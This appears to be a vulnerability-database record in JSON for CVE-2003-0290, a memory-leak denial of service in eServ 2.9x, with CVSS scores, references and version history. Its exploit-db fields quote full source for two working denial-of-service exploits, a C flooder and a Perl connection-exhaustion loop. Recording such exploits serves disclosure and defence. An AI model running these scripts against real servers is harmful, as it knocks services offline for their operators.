ID CVE-2003-0290 Type cve Reporter NVD Modified 2017-07-10T21:29:31
Description
Memory leak in eServ 2.9x allows remote attackers to cause a denial of service (memory exhaustion) via a large number of connections, whose memory is not freed when the connection is terminated.
{"id": "CVE-2003-0290", "bulletinFamily": "NVD", "title": "CVE-2003-0290", "description": "Memory leak in eServ 2.9x allows remote attackers to cause a denial of service (memory exhaustion) via a large number of connections, whose memory is not freed when the connection is terminated.", "published": "2003-06-16T00:00:00", "modified": "2017-07-10T21:29:31", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0290", "reporter": "NVD", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/11973", "http://marc.info/?l=bugtraq&m=105284630228137&w=2", "http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0064.html", "http://marc.info/?l=bugtraq&m=105284631428187&w=2", "http://www.securityfocus.com/bid/7552"], "cvelist": ["CVE-2003-0290"], "type": "cve", "lastseen": "2017-07-11T11:14:16", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:etype:eserv:2.9x"], "cvelist": ["CVE-2003-0290"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "description": "Memory leak in eServ 2.9x allows remote attackers to cause a denial of service (memory exhaustion) via a large number of connections, whose memory is not freed when the connection is terminated.", "edition": 2, "enchantments": {}, "hash": "5e335126ef63cbd69ba4e960112d529765472db8dd475313c85a3d65be922ccc", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "def0d7c799c11e5088ee63995417f9ea", "key": "cpe"}, {"hash": "c57bed2615fb5706646cb5d4b25acafa", "key": "href"}, {"hash": "9237bc9881240e1b0d6ee0bccec17223", "key": "cvelist"}, {"hash": "ddc016af03832adcbd977e201683d26f", "key": "title"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "f3e7c42c0468443cc0fb134e838c34e0", "key": "references"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "84813b1457b92d6ba1174abffbb83a2f", "key": "cvss"}, {"hash": "b35fe5e325c17f94b0e57c231c95023a", "key": "description"}, {"hash": "e0735c43e697c719742001558569b995", "key": "published"}, {"hash": "849b4e34b1a9ac7752a04e16a1dc0605", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0290", "id": "CVE-2003-0290", "lastseen": "2017-04-18T15:49:57", "modified": "2016-10-17T22:31:52", "objectVersion": "1.2", "published": "2003-06-16T00:00:00", "references": ["http://marc.info/?l=bugtraq&m=105284630228137&w=2", "http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0064.html", "http://xforce.iss.net/xforce/xfdb/11973", "http://marc.info/?l=bugtraq&m=105284631428187&w=2", "http://www.securityfocus.com/bid/7552"], "reporter": "NVD", "scanner": [], "title": "CVE-2003-0290", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 2, "lastseen": "2017-04-18T15:49:57"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:etype:eserv:2.9x"], "cvelist": ["CVE-2003-0290"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "description": "Memory leak in eServ 2.9x allows remote attackers to cause a denial of service (memory exhaustion) via a large number of connections, whose memory is not freed when the connection is terminated.", "edition": 1, "hash": "bf88bab82e9a4fcb96faabfae8370b141ce681c3ba4023921acb4d79b48ce6a3", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "def0d7c799c11e5088ee63995417f9ea", "key": "cpe"}, {"hash": "c57bed2615fb5706646cb5d4b25acafa", "key": "href"}, {"hash": "aa86d447f912e79de1883fd0cb0c0e11", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9237bc9881240e1b0d6ee0bccec17223", "key": "cvelist"}, {"hash": "ddc016af03832adcbd977e201683d26f", "key": "title"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "84813b1457b92d6ba1174abffbb83a2f", "key": "cvss"}, {"hash": "22aed420874a18c14c0025250e3768d5", "key": "references"}, {"hash": "b35fe5e325c17f94b0e57c231c95023a", "key": "description"}, {"hash": "e0735c43e697c719742001558569b995", "key": "published"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0290", "id": "CVE-2003-0290", "lastseen": "2016-09-03T03:57:21", "modified": "2008-09-05T16:33:58", "objectVersion": "1.2", "published": "2003-06-16T00:00:00", "references": ["http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0064.html", "http://marc.theaimsgroup.com/?l=bugtraq&m=105284630228137&w=2", "http://marc.theaimsgroup.com/?l=bugtraq&m=105284631428187&w=2", "http://xforce.iss.net/xforce/xfdb/11973", "http://www.securityfocus.com/bid/7552"], "reporter": "NVD", "scanner": [], "title": "CVE-2003-0290", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T03:57:21"}], "edition": 3, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "def0d7c799c11e5088ee63995417f9ea"}, {"key": "cvelist", "hash": "9237bc9881240e1b0d6ee0bccec17223"}, {"key": "cvss", "hash": "84813b1457b92d6ba1174abffbb83a2f"}, {"key": "description", "hash": "b35fe5e325c17f94b0e57c231c95023a"}, {"key": "href", "hash": "c57bed2615fb5706646cb5d4b25acafa"}, {"key": "modified", "hash": "f273706a1a77ee0a8a09ffee45b80eec"}, {"key": "published", "hash": "e0735c43e697c719742001558569b995"}, {"key": "references", "hash": "3454cc8844df82c07e4527f519f086bb"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "ddc016af03832adcbd977e201683d26f"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "caca67a0b3b211d93b3802b09eee359af6f2e66ffce3675321d217c80ac4f58b", "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2017-07-11T11:14:16"}, "dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:12080"]}, {"type": "exploitdb", "idList": ["EDB-ID:22586", "EDB-ID:22585"]}], "modified": "2017-07-11T11:14:16"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "cpe": ["cpe:/a:etype:eserv:2.9x"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"osvdb": [{"lastseen": "2017-04-28T13:20:07", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 11973\n[CVE-2003-0290](https://vulners.com/cve/CVE-2003-0290)\nBugtraq ID: 7552\n", "modified": "2003-05-11T00:00:00", "published": "2003-05-11T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:12080", "id": "OSVDB:12080", "type": "osvdb", "title": "Etype Eserv Non Terminated Connection Saturation DoS", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T19:05:05", "bulletinFamily": "exploit", "description": "EType EServ 2.98/2.99/3.0 Resource Exhaustion Denial Of Service Vulnerability (2). CVE-2003-0290. Dos exploit for windows platform", "modified": "2003-05-11T00:00:00", "published": "2003-05-11T00:00:00", "id": "EDB-ID:22586", "href": "https://www.exploit-db.com/exploits/22586/", "type": "exploitdb", "title": "EType EServ 2.98/2.99/3.0 Resource Exhaustion Denial of Service Vulnerability 2", "sourceData": "source: http://www.securityfocus.com/bid/7552/info\r\n \r\nA denial of service vulnerability has been reported for EServ. The vulnerability exists due to the way the server handles connections. Specifically, memory allocated for open connections are not properly freed when a connection no longer exists. This will result in a consumption of all available memory resources.\r\n \r\n**It has been reported that EServ version 3.0 previously thought to be invulnerable to this issue is affected by this vulnerability. This version was tested on Windows 2000.\r\n \r\nThis vulnerability affects EServ 2.92 to 3.0. \r\n\r\n/* m00-eServ-fun.c\r\n *\r\n * EServ/2.95-3.00 remote memory-leak exploit\r\n *\r\n * Result: exiting program and close all services\r\n * if you seen message: Broken pipe\r\n * then may going drink beer 8)\r\n *\r\n * Eserv 3.0 only web(80) services susceptible on this DoS\r\n *\r\n * rash / m00.void.ru\r\n */\r\n\r\n#include <stdio.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n\r\nint main(int argc, char *argv[])\r\n{ \r\n char buf[2000];\r\n int fd;\r\n struct sockaddr_in rsin;\r\n\r\n if (argc!=3) {\r\n printf(\"\\n usage: %s <ip> <port>\\n\\n\", argv[0]);\r\n exit(0); \r\n }\r\n \r\n rsin.sin_family = AF_INET;\r\n rsin.sin_port = htons(atoi(argv[2]));\r\n rsin.sin_addr.s_addr = inet_addr(argv[1]);\r\n \r\n for (fd=0;fd<2000;fd++)\r\n buf[fd]=(int *)((rand()*10));\r\n \r\n fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); \r\n if (connect(fd,(struct sockaddr *)&rsin,sizeof(struct sockaddr))) perror(\"[-] connect()\"),exit(0);\r\n printf(\"[+] connected..\\n\"); \r\n printf(\"[+] send data to host..\\n\"); \r\n \r\n while (1) {\r\n if ((send(fd, buf, 2000, 0))<0) \r\n break; \r\n } \r\n}\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22586/"}, {"lastseen": "2016-02-02T19:04:57", "bulletinFamily": "exploit", "description": "EType EServ 2.98/2.99/3.0 Resource Exhaustion Denial Of Service Vulnerability (1). CVE-2003-0290. Dos exploit for windows platform", "modified": "2003-05-11T00:00:00", "published": "2003-05-11T00:00:00", "id": "EDB-ID:22585", "href": "https://www.exploit-db.com/exploits/22585/", "type": "exploitdb", "title": "EType EServ 2.98/2.99/3.0 Resource Exhaustion Denial of Service Vulnerability 1", "sourceData": "source: http://www.securityfocus.com/bid/7552/info\r\n\r\nA denial of service vulnerability has been reported for EServ. The vulnerability exists due to the way the server handles connections. Specifically, memory allocated for open connections are not properly freed when a connection no longer exists. This will result in a consumption of all available memory resources.\r\n\r\n**It has been reported that EServ version 3.0 previously thought to be invulnerable to this issue is affected by this vulnerability. This version was tested on Windows 2000.\r\n\r\nThis vulnerability affects EServ 2.92 to 3.0. \r\n\r\n#!/usr/bin/perl\r\n#LEGAL NOTICE: Don't test this on networks you don't administer,\r\n#and do not test this tool on networks you don't own without\r\n#permission of the network owner. You are responsible for all\r\n#damage due to your use of this tool.\r\nuse IO::Socket;\r\nprint \"$0: eServ Remote DoS Exploit\\r\\n\";\r\nprint \"By Matthew Murphy \\<mattmurphy\\@kc.rr.com\\>\\r\\n\\r\\n\";\r\nprint \"Server hostname\\: \";\r\n$host = trim(chomp($line = <STDIN>));\r\nprint \"Service port to probe\\: \";\r\n$port = trim(chomp($line = <STDIN>));\r\nprint \"\\r\\nBeginning probe -- stop with CTRL+C\\r\\n\";\r\nwhile (1) {\r\n $f = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host:$port\");\r\n undef $f;\r\n}\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22585/"}]}